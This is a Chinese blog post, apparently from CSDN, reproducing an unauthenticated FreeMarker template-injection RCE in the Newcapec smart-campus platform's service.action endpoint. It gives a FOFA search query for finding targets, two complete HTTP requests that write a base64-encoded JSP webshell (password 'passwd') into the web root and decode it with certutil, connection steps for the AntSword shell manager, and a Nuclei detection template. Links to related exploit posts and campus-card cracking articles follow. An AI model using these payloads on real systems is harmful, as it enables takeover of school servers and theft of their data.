新开普智慧校园系统命令执行漏洞[2023HW 0DAY]

最新推荐文章于 2024-10-21 12:45:53 发布
最新推荐文章于 2024-10-21 12:45:53 发布
阅读量1.4k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46317063/article/details/132303688
版权

一、免责声明:

本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!

二、产品介绍:

    新开普智慧校园系统/service_transport/service.action接口处存在FreeMarker模板注入,攻击者可在未经身份认证的情况下,调用后台接口,构造恶意代码实现远程代码执行,最终可造成服务器失陷。

三、资产梳理:

title=“掌上校园服务管理平台”

四、漏洞复现:

访问:http://x.x.x.x/service_transport/service.action

出现以下界面,可能存在漏洞:
在这里插入图片描述
无回显
在这里插入图片描述

写入木马:


POST /service_transport/service.action HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{
        "command": "GetFZinfo", 
        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
        ?new()>${ex(\"cmd /c echo PCUhCiAgICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgewogICAgICAgIFUoQ2xhc3NMb2FkZXIgYykgewogICAgICAgICAgICBzdXBlcihjKTsKICAgICAgICB9CiAgICAgICAgcHVibGljIENsYXNzIGcoYnl0ZVtdIGIpIHsKICAgICAgICAgICAgcmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsIDAsIGIubGVuZ3RoKTsKICAgICAgICB9CiAgICB9CiAKICAgIHB1YmxpYyBieXRlW10gYmFzZTY0RGVjb2RlKFN0cmluZyBzdHIpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOwogICAgICAgICAgICByZXR1cm4gKGJ5dGVbXSkgY2xhenouZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBTdHJpbmcuY2xhc3MpLmludm9rZShjbGF6ei5uZXdJbnN0YW5jZSgpLCBzdHIpOwogICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOwogICAgICAgICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsKICAgICAgICAgICAgcmV0dXJuIChieXRlW10pIGRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIFN0cmluZy5jbGFzcykuaW52b2tlKGRlY29kZXIsIHN0cik7CiAgICAgICAgfQogICAgfQolPgo8JQogICAgU3RyaW5nIGNscyA9IHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzd2QiKTsKICAgIGlmIChjbHMgIT0gbnVsbCkgewogICAgICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGJhc2U2NERlY29kZShjbHMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7CiAgICB9CiU+ >./webapps/ROOT/1.txt\")}"
}

文件转换为jsp

POST /service_transport/service.action HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{
        "command": "GetFZinfo", 
        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c certutil -decode ./webapps/ROOT/1.txt ./webapps/ROOT/1.jsp\")}"
}

蚁剑连接​:http://your-ip/1.jsp

密码passwd
在这里插入图片描述

五、Nuclei检测:

id: newcapec_zhihuischool_rce
info:
  name: newcapec_zhihuischool_rce
  author: joyboy
  severity: critical
  description: http://xxx.xxx.xxx/AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
  metadata:
    max-request: 1
    fofa-query: title="掌上校园服务管理平台"
    verified: true
  tags: newcapec_zhihuischool,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/service_transport/service.action"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '本次处理完成,请求数据为空'

在这里插入图片描述

开普智慧校园系统RCE漏洞复现(0day
0xSec
07-08 4483
开普智慧校园系统/service_transport/service.action接口处存在FreeMarker模板注入,攻击者可在未经身份认证的情况下,调用后台接口,构造恶意代码实现远程代码执行,最终可造成服务器失陷
开普掌上校园服务管理平台service.action RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-30 493
开普掌上校园服务管理平台service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。
开普智慧校园系统RCE漏洞
holyxp的博客
07-12 1821
开普智慧校园体系基于业务、数据双中台理念,建立共享开放能力平台,实现能力开放和服务与数据的全生命周期治理;基于一云多端,混合云服务模式,覆盖管理、生活、教学、科研和社会化服务全场景,让师生随时随地获得资源和服务;围绕按主题建设,按场景上线,以评促建,可持续发展的路径,渐进建设全业务应用场景,让智慧校园建设更简单。
开普智慧校园系统RCE漏洞 [附POC]
薛定谔嘚喵博客
11-07 494
开普智慧校园系统/service_transport/service.action接口处存在FreeMarker模板注入,攻击者可在未经身份认证的情况下,调用后台接口,构造恶意代码实现远程代码执行,最终可造成服务器失陷。
开普掌上校园服务管理平台service.action存在远程命令执行漏洞
最新发布
wph110016的博客
10-21 431
开普智慧校园体系基于业务、数据双中台理念,建立共享开放能力平台,实现能力开放和服务与数据的全生命周期治理;基于一云多端,混合云服务模式,覆盖管理、生活、教学、科研和社会化服务全场景,让师生随时随地获得资源和服务;围绕按主题建设,按场景上线,以评促建,可持续发展的路径,渐进建设全业务应用场景,让智慧校园建设更简单。
2023HW系列】红蓝队基本知识手册(建议收藏)
2301_77472496的博客
06-08 1978
蓝队,一般是指网络实战攻防演习中的攻击一方。👉网安(黑客红蓝对抗)所有方向的学习路线👈蓝队一般会采用针对目标单位的从业人员,以及目标系统所在网络内的软件、硬件设备同时执行多角度、全方位、对抗性的混合式模拟攻击手段;通过技术手段实现系统提权、控制业务、获取数据等渗透目标,来发现系统、技术、人员、管理和基础架构等方面存在的网络安全隐患或薄弱环节。蓝队人员并不是一般意义上的电脑黑客。因为黑客往往以攻破系统,获取利益为目标;而蓝队则是以发现系统薄弱环节,提升系统安全性为目标。
HW2020-0day总结1
08-03
2.天融信TopApp-LB sql注入 4.绿盟UTS绕过登录 5.WPS命令执行漏洞 6.齐治堡垒机 rce 7.联软准入漏洞 8.泛微云桥任意文件读取
2023年国家护网0day-poc/exp漏洞全汇总(目前已更到91个..实时更中...)
08-21 4316
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更到91个漏洞,本文会实时更,有漏洞都会加上
2023HW护网100+个漏洞poc
Yb528970805的博客
09-19 3645
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646。13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC。3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300。25 . Panabit iXCache网关RCE漏洞CVE-2023-38646。65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC。66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC。
校园一卡通的快速破解
I'm a 软件工程师
07-05 2万+
原文:http://bbs.pediy.com/showthread.php?t=162099 校园一卡通的快速破解 校园一卡通在高校被广泛使用,能够方便地实现转账消费一体化。在学校内可用于食堂,浴室,超市的消费,工作场所的门禁卡。每个学校在实现一卡通方案时会根据特有环境进行定制,下文所讨论的情形限定于我所在的学校,未必放之四海而皆准。 校园卡使用了Mifare Classic 4k
开普用户手册
07-20
开普一卡通操作手册培训文档,系统安装,使用,维护等。
云南开普智慧校园一卡通解决方案,K12智慧校园信息化建设解决方案
云南IDC、阿里云、华为云服务
10-15 1万+
一、天成科技-开普云南授权总代,云南智慧校园建设解决方案中心 开普是一家只在为教育信息化领域带来智慧科技服务的企业,近20年一直致力于提升智慧校园应用场景创开普电子股份有限公司2000年成立于郑州高技术产业开发区,注册资本4.81亿元。公司于2011年7月29日登陆资本市场,成为中国一卡通领域首家上市公司。现有员工1000余人,拥有2家全资子公司,4家控股子公司,7家参股子公司,6家分公司,并在全国30余个大、中城市设立了驻外服务机构。 作为一卡通行业首家上市公司,开普深耕高校信息化行业18
网络安全——命令执行漏洞概述
weixin_54055099的博客
09-17 2764
命令执行漏洞的概述,管道符号在LINUX和Windows的用户
一卡通(M1卡)破解过程记录——理论篇
遇见即为缘
11-19 5370
前些日子在研究学校的一卡通安全,在此记录一下一卡通破解的全过程,仅用作学习交流,切勿用于违法用途 其他几篇:一卡通(M1卡)破解过程记录——准备篇 获取扇区密钥 数据分析篇 理论篇参考了国内外的一些文献,写的比较杂乱,如有错误请指正,有条件的推荐去谷歌一些外文文献了解其原理,如《Attack.MIFARE》、《Dismantling_MIFARE_Classic》、《Pickpocketing.Mifare》、《The-MIFARE-Hack-1》和...
一卡通(M1卡)破解过程记录——获取扇区密钥
热门推荐
遇见即为缘
11-19 2万+
前些日子在研究学校的一卡通安全,在此记录一下一卡通破解的全过程,仅用作学习交流,切勿用于违法用途 其他几篇:一卡通(M1卡)破解过程记录——准备篇 理论篇 数据分析篇 一般淘宝卖的pm3都送比较高级的windows下的GUI软件,这个软件使用比较傻瓜化而且一般附带教程,我在这里不再介绍详细的使用过程,假设你的pm3是自己组装的或者没有附带国产软件,那你可以在Proxmark3的Github找到配套的命令行软件,Linux下编译好用Terminal运行...
开普掌上校园服务管理平台service.action远程命令执行
weixin_43567873的博客
03-28 130
开普掌上校园服务管理平台service.action远程命令执行
开普掌上校园 service.action 远程命令执行
qq_36334672的博客
01-24 435
title=“掌上校园服务管理平台”
漏洞复现】某学院教务一体化系统——任意账号密码重置
LongL_GuYu的博客
07-25 1484
某学院教务一体化系统存在任意账号密码重置漏洞
CSRF安全漏洞修复
Innocence_0的博客
02-02 1153
本处判断只判断接口,对页面进行放行(判断是否为页面的依据是接口的controller和请求页面的controller的继承类不同,接口的集成的类是AbstractAPIController,在每个请求中增加referer字段,如果没有这个字段则说明是伪造的请求。然后判断referer字段的域名和request的请求域名是否相同,如果不同则说明是伪造的请求。页面的集成类是 AbstractController,这两个类是自己写的。除了这些还需要拦截器配置。
"开普智慧校园规划方案2017-V1详解
同时,该规划方案突出了开普智慧校园的建设重点和规划目标,旨在提高学校的信息化管理水平,提升教学质量和科研能力。 规划方案中第一章项目概述对智慧校园建设进行了整体铺陈,包括国内高校信息化现状、校园信息...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值